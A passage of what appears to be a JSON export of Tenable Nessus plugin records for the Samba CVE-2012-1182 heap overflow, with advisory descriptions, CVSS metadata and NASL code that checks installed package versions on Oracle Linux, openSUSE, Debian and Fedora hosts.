script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"samba-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-client-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-common-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-swat-3.0.33-3.36.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-client / samba-common / samba-swat\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T01:20:26", "bulletinFamily": "scanner", "description": "Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.", "modified": "2020-04-02T00:00:00", "id": "OPENSUSE-2012-224.NASL", "href": "https://www.tenable.com/plugins/nessus/74601", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-224.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74601);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:00\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)\");\n script_summary(english:\"Check for the openSUSE-2012-224 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-04/msg00036.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldapsmb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ldapsmb-1.34b-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb-devel-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-debuginfo-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc-devel-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-debuginfo-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb-devel-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-debuginfo-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent-devel-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-debuginfo-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debugsource-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-debuginfo-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-debuginfo-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-debuginfo-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-debuginfo-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-3.6.3-112.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldapsmb / libldb-devel / libldb1 / libldb1-32bit / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:00:29", "bulletinFamily": "scanner", "description": "It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.", "modified": "2012-04-13T00:00:00", "id": "DEBIAN_DSA-2450.NASL", "href": "https://www.tenable.com/plugins/nessus/58729", "published": "2012-04-13T00:00:00", "title": "Debian DSA-2450-1 : samba - privilege escalation", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2450. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58729);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"DSA\", value:\"2450\");\n\n script_name(english:\"Debian DSA-2450-1 : samba - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=668309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2450\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the samba packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libpam-smbpass\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient-dev\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libwbclient0\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common-bin\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-dbg\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc-pdf\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-tools\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"smbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"swat\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"winbind\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:22:22", "bulletinFamily": "scanner", "description": "This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2012-05-16T00:00:00", "id": "FEDORA_2012-6382.NASL", "href": "https://www.tenable.com/plugins/nessus/59098", "published": "2012-05-16T00:00:00", "title": "Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6382.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59098);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n\n script_name(english:\"Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=804093\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a742831d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n 